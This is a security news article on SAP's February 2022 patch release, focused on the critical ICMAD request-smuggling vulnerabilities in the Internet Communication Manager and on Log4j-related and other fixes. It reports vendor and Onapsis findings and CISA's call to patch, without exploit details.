SAP Customers Warned About Critical ‘ICMAD’ Vulnerabilities
As part of its February 2022 Security Patch Day, German software maker SAP has announced the release of 13 new security notes and updates for five other security notes.
The company also released an out-of-band note, for a total of 19 security notes, to which three other notes that were released or updated since the second Tuesday of January should be added.
Eight of the 22 security notes were rated ‘Hot News’ – the highest rating in the company’s books –, a record number for the company. However, four of these are updates for previously released security notes.
Three of the newly released Hot News security notes have a CVSS score of 10, while the fourth has a CVSS score of 9.1. All of the updated Hot News notes have a CVSS score of 10.
The most important of these vulnerabilities is CVE-2022-22536, a request smuggling and request concatenation issue in NetWeaver, Content Server and Web Dispatches that could be abused to compromise any NetWeaver-based Java or ABAP application running the default configuration.
The vulnerability can be exploited with a single request delivered through the commonly exposed HTTP(S) service, without authentication, business application security firm Onapsis explains. An attacker could steal the victim’s session and credentials in plain text.
Onapsis warns that CVE-2022-22536 can be exploited in combination with a high-severity HTTP request smuggling vulnerability (CVE-2022-22532) to compromise NetWeaver Java systems.
These and a vulnerability tracked as CVE-2022-22533 are collectively tracked as ICMAD because they reside in the Internet Communication Manager (ICM) component, which is used by many SAP applications.
“CVE-2022-22536 is exploitable when an HTTP(S) proxy is sitting in between clients and the backend SAP system, which is the most common scenario for HTTP(S) access in any productive landscape. The Onapsis Research Labs validated that attackers could also exploit CVE-2022-22532 […] in the absence of a proxy. The combination of both vulnerabilities makes it possible to compromise SAP NetWeaver Java systems regardless of the use of proxies.” Onapsis says.
The security company also warns of challenges associated with detecting attacks targeting ICMAD – as malicious requests are difficult to differentiate from benign requests – and underlines that successful exploitation leads to complete system takeover and does not require previous authentication.
By exploiting these vulnerabilities, attackers can steal user credentials and personal information, exfiltrate sensitive information, perform fraudulent financial transactions, disrupt critical systems and cause denial of service conditions, or change banking details in a financial system of record, Onapsis explains.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged organizations to apply the patches for the ICMAD flaws as soon as possible.
Two other Hot News security notes address remote code execution issues related to the use of Apache Log4j in SAP Commerce and Data Intelligence 3 (on-premise), respectively.
The last of this month’s Hot News security notes addresses a missing segregation of duties in Solution Manager Diagnostics Root Cause Analysis Tools (CVE-2022-22544, CVSS score of 9.1) that could allow an attacker with admin privileges to browse files and execute code on all Diagnostics Agents over the network, Onapsis explains.
Three of the updated Hot News security notes also deal with Log4j vulnerabilities, while the fourth brings Chromium release 97.0.4692.99 to SAP Business Client.
SAP also patched an SQL injection flaw in NetWeaver AS ABAP (Workplace Server) that could allow an attacker to execute crafted database queries, and updated a security note dealing with two vulnerabilities in the F0743 Create Single Payment application of S/4HANA.
Six medium-severity bugs were addressed this month in NetWeaver, ERP HCM, Business Objects Web Intelligence (BI Launchpad), 3D Visual Enterprise Viewer, Adaptive Server Enterprise, and S/4HANA. SAP also patched a low-severity denial of service in NetWeaver Application Server for ABAP and ABAP Platform.